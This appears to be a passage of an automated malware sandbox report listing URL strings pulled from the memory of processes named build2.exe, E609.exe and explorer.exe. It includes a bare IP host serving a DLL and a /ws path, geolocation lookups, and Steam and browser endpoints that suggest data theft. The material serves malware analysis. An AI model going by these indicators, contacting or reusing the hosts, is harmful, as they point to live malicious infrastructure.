Source: build2.exe, 00000013.00000003.2500716201.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500606449.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2500169999.00000000008F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/vcruntime140.dll65.109.242.59
Source: build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/vcruntime140.dllHp
Source: build2.exe, 00000013.00000003.2210740943.0000000000810000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59/ws
Source: build2.exe, 00000013.00000002.2651384676.0000000000553000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59DHDA
Source: build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.59DHIE
Source: build2.exe, 00000013.00000003.2318827088.00000000008A5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://65.109.242.5P
Source: build2.exe, 00000013.00000003.2341625569.0000000000924000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: explorer.exe, 00000001.00000000.1692249717.000000000C893000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe
Source: explorer.exe, 00000001.00000000.1688547736.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2891687444.0000000008D32000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/Vh5j3k
Source: explorer.exe, 0000002A.00000002.2873664959.0000000001388000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/odirm
Source: explorer.exe, 00000001.00000000.1688547736.00000000079FB000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/odirmr
Source: explorer.exe, 00000001.00000000.1692249717.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://android.notify.windows.com/iOS
Source: E609.exe, 0000000A.00000002.2053964742.000000000059A000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 0000000F.00000002.2877170339.0000000000838000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 00000011.00000002.2876679850.0000000000706000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 0000001B.00000003.2207878120.0000000000796000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 0000001B.00000003.2206427054.0000000000795000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 0000001B.00000002.2211602242.0000000000796000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 00000021.00000003.2274475907.0000000000715000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 00000021.00000002.2275857903.0000000000716000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/
Source: E609.exe, 0000001B.00000003.2207878120.0000000000796000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 0000001B.00000003.2206427054.0000000000795000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 0000001B.00000002.2211602242.0000000000796000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/Root
Source: E609.exe, 0000000F.00000002.2877170339.0000000000838000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/au
Source: E609.exe, E609.exe, 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E609.exe, 0000000F.00000003.2069180655.0000000000894000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 00000010.00000002.2077051792.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, E609.exe, 00000011.00000002.2876679850.0000000000706000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 00000011.00000003.2086486753.000000000075E000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 00000011.00000002.2876679850.00000000006C8000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 00000011.00000002.2873470043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E609.exe, 00000011.00000003.2085516872.0000000000765000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 00000019.00000002.2186742765.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, E609.exe, 0000001B.00000003.2207878120.0000000000796000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 0000001B.00000002.2211493780.0000000000787000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 0000001B.00000002.2211670319.00000000007D8000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 0000001B.00000003.2206427054.0000000000795000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 0000001B.00000003.2207878120.00000000007D1000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 0000001B.00000002.2211120304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E609.exe, 0000001B.00000003.2210896426.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 0000001B.00000002.2211493780.0000000000748000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 0000001B.00000003.2206427054.00000000007D1000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 0000001B.00000002.2211602242.0000000000796000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 0000001F.00000002.2266971281.0000000004A80000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/geo.json
Source: E609.exe, 0000000F.00000002.2877170339.00000000007F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/geo.json)
Source: E609.exe, 0000001B.00000003.2207878120.0000000000796000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 0000001B.00000003.2206427054.0000000000795000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 0000001B.00000002.2211602242.0000000000796000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/geo.json-Agent:
Source: E609.exe, 00000011.00000003.2086486753.000000000075E000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 00000011.00000003.2085516872.0000000000765000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/geo.json.
Source: E609.exe, 00000011.00000002.2876679850.00000000006C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/geo.jsonG
Source: E609.exe, 0000001B.00000002.2211670319.00000000007D8000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 0000001B.00000003.2207878120.00000000007D1000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 0000001B.00000003.2210896426.00000000007D6000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 0000001B.00000003.2206427054.00000000007D1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/geo.jsonJ
Source: E609.exe, 00000021.00000003.2274475907.0000000000715000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 00000021.00000002.2275857903.0000000000716000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/geo.jsonR
Source: E609.exe, 00000021.00000003.2274475907.0000000000715000.00000004.00000020.00020000.00000000.sdmp, E609.exe, 00000021.00000002.2275857903.0000000000716000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/geo.jsonV_
Source: E609.exe, 0000000F.00000002.2877170339.00000000007F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/geo.jsonY
Source: E609.exe, 00000021.00000002.2275857903.00000000006C8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/geo.jsonje
Source: E609.exe, 0000001B.00000002.2211493780.0000000000748000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.2ip.ua/geo.jsonq
Source: explorer.exe, 00000001.00000000.1690075566.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2710261616.0000000008FBC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2891687444.0000000008FBC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/
Source: explorer.exe, 00000001.00000000.1690075566.00000000097D4000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/q
Source: explorer.exe, 0000002A.00000003.2707064136.0000000008E66000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGYvVowZJuHA3XaH0uUvg1ZJ0GUZnXk3mxxPF&ocid=wind
Source: explorer.exe, 00000001.00000000.1690075566.00000000096DF000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?&
Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?activityId=0CC40BF291614022B7DF6E2143E8A6AF&timeOut=5000&oc
Source: explorer.exe, 0000002A.00000002.2891687444.0000000008DAD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com/v1/news/Feed/Windows?s
Source: explorer.exe, 00000001.00000000.1690075566.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?
Source: explorer.exe, 0000002A.00000003.2709284810.0000000008F4F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2708310772.0000000008F3F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2891687444.0000000008E46000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2707064136.0000000008ED6000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.msn.com:443/v1/news/Feed/Windows?R
Source: build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://api.steampowered.com/
Source: explorer.exe, 0000002A.00000003.2710261616.0000000008FBC000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2891687444.0000000008FBC000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://arc.msn.com
Source: explorer.exe, 00000001.00000000.1690075566.00000000096DF000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://arc.msn.comi
Source: explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg
Source: explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings
Source: explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/finance/crypto/
Source: explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg
Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/humidity.svg
Source: build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://avatars.cloudflare.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bing.c
Source: build2.exe, 00000013.00000002.2663278860.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.0000000000892000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.
Source: build2.exe, 00000013.00000002.2663278860.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.0000000000892000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta
Source: build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://broadcast.st.dl.eccdnx.com
Source: build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/
Source: build2.exe, 00000013.00000003.2341625569.0000000000924000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV
Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark
Source: explorer.exe, 00000001.00000000.1688547736.00000000078AD000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu
Source: explorer.exe, 00000001.00000000.1688547736.00000000078AD000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark
Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu
Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark
Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY
Source: explorer.exe, 00000001.00000000.1688547736.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002A.00000002.2880479170.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2627186467.0000000004D94000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000002A.00000003.2632903713.0000000004D94000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark
Source: build2.exe, 00000013.00000003.2341625569.0000000000924000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: build2.exe, 00000013.00000003.2341625569.0000000000924000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://checkout.steampowered.com/
Source: build2.exe, 00000013.00000003.2122792993.0000000000843000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.0000000000838000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/applications/community/main.css?v=Hpc3R3GOIT
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/globalv2.css?v=pwVcIAtHNXwg&amp;l=english&am
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/promo/summer2017/stickers.css?v=bZKSp7oNwVPK
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/header.css?v=vh4BMeDcNiCU&amp;l=engli
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh&amp;
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/css/skin_1/profilev2.css?v=gNE3gksLVEVa&amp;l=en
Source: build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.0000000000838000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: build2.exe, 00000013.00000003.2210740943.0000000000829000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2175286059.0000000000829000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156939086.0000000000829000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.0000000000838000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/libraries~b28b
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.0000000000838000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=7tll
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.0000000000838000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=PyuRtGtUpR0t&amp;l=englis
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC&
Source: build2.exe, 00000013.00000003.2174697483.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2156801668.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2227633586.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2663278860.000000000083D000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2651384676.000000000043C000.00000040.00000400.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2248160002.000000000083F000.00000004.00000020.00020000.00000000.sdmp, build2.exe, 00000013.00000003.2208760469.000000000083F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=Wd0kCESeJquW&amp;l=
